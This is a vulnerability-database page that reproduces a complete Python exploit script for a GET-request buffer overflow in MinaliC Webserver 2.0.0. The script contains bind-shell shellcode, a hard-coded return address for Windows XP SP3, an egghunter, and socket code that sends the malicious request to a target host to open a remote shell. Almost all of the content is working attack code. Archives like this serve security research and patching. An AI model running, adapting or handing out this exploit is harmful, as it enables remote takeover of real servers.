Vulners
Lucene search
MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)
#!/usr/bin/env python
# Exploit Title: MinaliC Webserver buffer overflow (egghunter)
# Date: August 13 2013
# Exploit Author: PuN1sh3r
# Email: [email protected]
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP3, English
#
# Description:
# Remote command execution by triggering a buffer overflow in the GET
# request along with some buffer gymnastics using egghunters in order to attain a shell .
# gr33zt to superkojiman for the initial exploit
import socket
# windows/shell_bind_tcp http://www.metasploit.com
# * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=process,InitialAutoRunScript=, AutoRunScript=
shellcode = (
"\x89\xe7\xda\xc0\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x49\x78\x6b\x39\x37\x70\x33\x30\x77\x70\x43\x50\x4d"
"\x59\x38\x65\x44\x71\x6b\x62\x73\x54\x6e\x6b\x61\x42\x34\x70"
"\x4c\x4b\x43\x62\x74\x4c\x6c\x4b\x36\x32\x56\x74\x4c\x4b\x72"
"\x52\x75\x78\x44\x4f\x68\x37\x70\x4a\x67\x56\x66\x51\x4b\x4f"
"\x34\x71\x4b\x70\x4c\x6c\x55\x6c\x61\x71\x51\x6c\x63\x32\x76"
"\x4c\x77\x50\x4b\x71\x4a\x6f\x34\x4d\x47\x71\x58\x47\x5a\x42"
"\x58\x70\x70\x52\x33\x67\x4c\x4b\x53\x62\x52\x30\x4e\x6b\x30"
"\x42\x65\x6c\x57\x71\x68\x50\x4c\x4b\x77\x30\x62\x58\x6d\x55"
"\x49\x50\x71\x64\x30\x4a\x56\x61\x5a\x70\x42\x70\x4c\x4b\x52"
"\x68\x66\x78\x6c\x4b\x42\x78\x45\x70\x56\x61\x6a\x73\x79\x73"
"\x35\x6c\x77\x39\x4c\x4b\x77\x44\x6c\x4b\x76\x61\x4e\x36\x65"
"\x61\x6b\x4f\x34\x71\x69\x50\x4e\x4c\x7a\x61\x38\x4f\x54\x4d"
"\x63\x31\x4a\x67\x76\x58\x79\x70\x34\x35\x6a\x54\x55\x53\x61"
"\x6d\x7a\x58\x35\x6b\x61\x6d\x31\x34\x43\x45\x58\x62\x30\x58"
"\x4c\x4b\x73\x68\x44\x64\x47\x71\x6e\x33\x62\x46\x4c\x4b\x66"
"\x6c\x30\x4b\x4e\x6b\x32\x78\x55\x4c\x63\x31\x48\x53\x4c\x4b"
"\x63\x34\x4e\x6b\x75\x51\x38\x50\x4b\x39\x62\x64\x61\x34\x71"
"\x34\x61\x4b\x63\x6b\x61\x71\x63\x69\x53\x6a\x76\x31\x59\x6f"
"\x4d\x30\x33\x68\x31\x4f\x30\x5a\x4c\x4b\x37\x62\x48\x6b\x4d"
"\x56\x63\x6d\x53\x58\x36\x53\x70\x32\x73\x30\x57\x70\x32\x48"
"\x74\x37\x71\x63\x37\x42\x33\x6f\x43\x64\x73\x58\x30\x4c\x61"
"\x67\x45\x76\x76\x67\x79\x6f\x58\x55\x38\x38\x6e\x70\x65\x51"
"\x63\x30\x33\x30\x57\x59\x4b\x74\x31\x44\x76\x30\x51\x78\x54"
"\x69\x4f\x70\x52\x4b\x33\x30\x6b\x4f\x79\x45\x56\x30\x32\x70"
"\x76\x30\x56\x30\x43\x70\x56\x30\x53\x70\x36\x30\x51\x78\x49"
"\x7a\x54\x4f\x59\x4f\x79\x70\x4b\x4f\x4a\x75\x6d\x59\x6b\x77"
"\x54\x71\x4b\x6b\x76\x33\x65\x38\x76\x62\x73\x30\x45\x51\x4d"
"\x6b\x4c\x49\x4a\x46\x53\x5a\x64\x50\x71\x46\x50\x57\x52\x48"
"\x68\x42\x4b\x6b\x34\x77\x65\x37\x4b\x4f\x4e\x35\x33\x63\x42"
"\x77\x35\x38\x38\x37\x6b\x59\x44\x78\x6b\x4f\x49\x6f\x6e\x35"
"\x33\x63\x73\x63\x50\x57\x65\x38\x64\x34\x7a\x4c\x45\x6b\x6d"
"\x31\x59\x6f\x79\x45\x61\x47\x6e\x69\x6a\x67\x65\x38\x70\x75"
"\x52\x4e\x62\x6d\x63\x51\x79\x6f\x48\x55\x51\x78\x53\x53\x42"
"\x4d\x51\x74\x65\x50\x6e\x69\x6a\x43\x36\x37\x53\x67\x53\x67"
"\x50\x31\x39\x66\x50\x6a\x45\x42\x62\x79\x43\x66\x48\x62\x59"
"\x6d\x72\x46\x78\x47\x37\x34\x37\x54\x47\x4c\x33\x31\x65\x51"
"\x4e\x6d\x57\x34\x64\x64\x54\x50\x59\x56\x57\x70\x70\x44\x33"
"\x64\x70\x50\x73\x66\x61\x46\x33\x66\x67\x36\x53\x66\x50\x4e"
"\x42\x76\x43\x66\x72\x73\x56\x36\x62\x48\x71\x69\x48\x4c\x45"
"\x6f\x6d\x56\x59\x6f\x78\x55\x4c\x49\x49\x70\x42\x6e\x30\x56"
"\x47\x36\x59\x6f\x66\x50\x72\x48\x63\x38\x4d\x57\x65\x4d\x33"
"\x50\x6b\x4f\x4e\x35\x4d\x6b\x48\x70\x48\x35\x4f\x52\x63\x66"
"\x72\x48\x4f\x56\x4c\x55\x6d\x6d\x4f\x6d\x39\x6f\x5a\x75\x57"
"\x4c\x33\x36\x71\x6c\x37\x7a\x4d\x50\x79\x6b\x59\x70\x72\x55"
"\x54\x45\x4d\x6b\x43\x77\x55\x43\x72\x52\x42\x4f\x61\x7a\x57"
"\x70\x36\x33\x49\x6f\x5a\x75\x41\x41"
)
# Return addres Note:
# 77C11F13 JMP EBX on msvcrt.dll Windows XP SP3 English
ret = "\x13\x1F\xC1\x77"
junk = "\x41" * 245 + ret
host = "\x90" * 30 + "A" * 40 + "\x90" * 31
egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
buf = "GET /" + junk + " HTTP/1.1\r\n" + "Host: " + "\x90" * (100 - len(egg)) + egg + "\r\n"
buf += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf += "User-Agent: " + "T00W" + "T00W" + "\x90" * (900 - len(shellcode)) + shellcode + "\r\n\r\n"
print buf
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.5", 8080))
s.send(buf)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1